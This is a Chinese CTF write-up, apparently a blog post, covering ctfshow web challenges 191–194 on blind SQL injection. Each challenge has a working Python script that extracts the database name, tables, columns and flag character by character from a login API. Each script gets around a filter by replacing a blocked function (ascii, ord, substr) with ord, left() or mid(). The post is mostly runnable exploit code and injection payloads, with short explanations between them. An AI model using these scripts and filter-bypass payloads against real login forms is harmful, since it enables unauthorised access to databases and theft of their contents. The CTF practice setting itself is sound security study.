ctfshow——web入门191~194

(堆叠放一起吧)
web入门191

根据:

可进行盲注

这里过滤了ascii,我们可以使用ord

ord:

用于获取单个字符的 Unicode 码点(code point)。这意味着它接受一个长度为 1 的字符串(即单个字符),并返回该字符对应的整数值

改成ord的形式就可以了

复制代码
import requests
import string

url = "http://08e94587-dd32-4505-9c16-b144810ab1fc.challenge.ctf.show/api/index.php"
out = ''
for j in range(1, 50):
        for k in range(32, 128):
     
            data={
                #'username': f"1'|| if(ord(substr(database(),{j},1))={k},1,0)#",
                #'username': f"1'||if(ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{j},1))={k},1,0)#",
                #'username': f"1'||if(ord(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{j},1))={k},1,0)#"
                'username': f"1'or if(ord(substr((select f1ag from ctfshow_fl0g),{j},1))={k},1,0)#",
                'password': '1'
            }
     
            re = requests.post(url, data=data)
            if("\\u5bc6\\u7801\\u9519\\u8bef" in re.text):
                out += chr(k)
                print(out)
                break
web入门192

逻辑和前几题一样,只不过过滤了ord

但字母数字都放出来了

脚本:

复制代码
import requests

url = "http://a9ad4300-7f04-4f81-b800-f744c51f800a.challenge.ctf.show/api/"

result = ""
letters = "{-}_0123456789abcdefghijklmnopqrstuvwxyz"

for i in range(0, 50):
    for mid in letters:
        # 查数据库
        #payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # 查字段
        # payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
        # 查flag
        payload = "select group_concat(f1ag) from ctfshow_fl0g"
        data = {
            'username': f"admin' and if(substr(({payload}),{i},1)='{mid}', 1, 2) = '1",
            'password': '1'
        }

        re = requests.post(url, data=data)
        
        if("\\u5bc6\\u7801\\u9519\\u8bef" in re.text):
                result += mid
                print(f"{result}")
                break
web入门193
禁了sbstir, 但可以用left()或者right()

eft()返回具有指定长度的字符串的左边部分。

left(string,length);

  • length:想要截取的长度

right()返回具有指定长度的字符串的右边部分,用法同上。

left(..., i)

  • 使用 SQL 的 LEFT() 函数,提取 f1ag 字段值的前 i 个字符。

  • i 是当前猜测的字符长度

    import requests

    url = "http://3e35ebe8-11c9-4f4f-b036-5a7914516b3d.challenge.ctf.show/api/"

    result = ""
    letters = "{-}_0123456789abcdefghijklmnopqrstuvwxyz"
    tempstr = ""

    for i in range(1,60):
    for mid in letters:
    #payload = "admin'and ((left((select database()),{})='{}'))#".format(i,tempstr+mid)
    #ctfshow_web
    #payload = "admin'and ((left((select group_concat(table_name) from information_schema.tables where table_schema=database()),{})='{}'))#".format(i,tempstr+mid)
    #ctfshow_flxg
    #payload = "admin'and ((left((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg'),{})='{}'))#".format(i,tempstr+mid)
    #id,f1ag
    payload = "admin'and ((left((select f1ag from ctfshow_flxg),{})='{}'))#".format(i,tempstr+mid)

    复制代码
          data = {
              "username":payload,
              "password":0,
          }
          re = requests.post(url = url,data =data)
          
          
          if("\\u5bc6\\u7801\\u9519\\u8bef" in re.text):
                  result += mid
                  tempstr += mid
                  print(f"{result}")
                  break
web入门194

又过滤了

我们可以用mid或者lpad

复制代码
import requests

url = "http://dfe1ba5d-27f7-4629-a3d9-c6ad7f73769b.challenge.ctf.show/api/"

result = ""
letters = "{-}_0123456789abcdefghijklmnopqrstuvwxyz"

for i in range(0, 50):
    for mid in letters:
        #payload = "admin'and ((mid((select database()),{},1)='{}'))#".format(i,mid)
        #ctfshow_web
        #payload = "admin'and ((mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1)='{}'))#".format(i,mid)
        #ctfshow_flxg
        #payload = "admin'and ((mid((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg'),{},1)='{}'))#".format(i,mid)
        #id,f1ag
        payload = "admin'and ((mid((select f1ag from ctfshow_flxg),{},1)='{}'))#".format(i,mid)

        data = {
            "username":payload,
            "password":0,
        }
        
        re = requests.post(url, data=data)
        
        if("\\u5bc6\\u7801\\u9519\\u8bef" in re.text):
                result += mid
                print(f"{result}")
                break
相关推荐
三流搬砖艺术家几秒前
Windows 下 MongoDB 安装指南
数据库·mongodb
文牧之4 分钟前
PostgreSQL 的 pg_current_logfile 函数
运维·数据库·postgresql
kngines12 分钟前
【PostgreSQL数据分析实战:从数据清洗到可视化全流程】6.1 客户分群分析(RFM模型构建)
数据库·postgresql·数据分析·rfm模型·客户分群
Stark-C22 分钟前
7400MB/s&5050TBW完美结合,全新希捷酷玩530R SSD体验评测
服务器·网络·数据库
小猪咪piggy36 分钟前
【MySQL】(10)用户和权限管理
数据库·mysql
喵手44 分钟前
Spring Boot 中的事务管理是如何工作的?
数据库·spring boot·后端
秀才恶霸1 小时前
04-redis
数据库·redis·缓存
hie988941 小时前
如何配置 Java 安全管理器来避免访问控制异常
java·python·安全
Timmer丿1 小时前
AI开发跃迁指南(第三章:第四维度1——Milvus、weaviate、redis等向量数据库介绍及对比选型)
数据库·人工智能·milvus
GUIQU.1 小时前
【MySQL】SQL简述
数据库·sql·mysql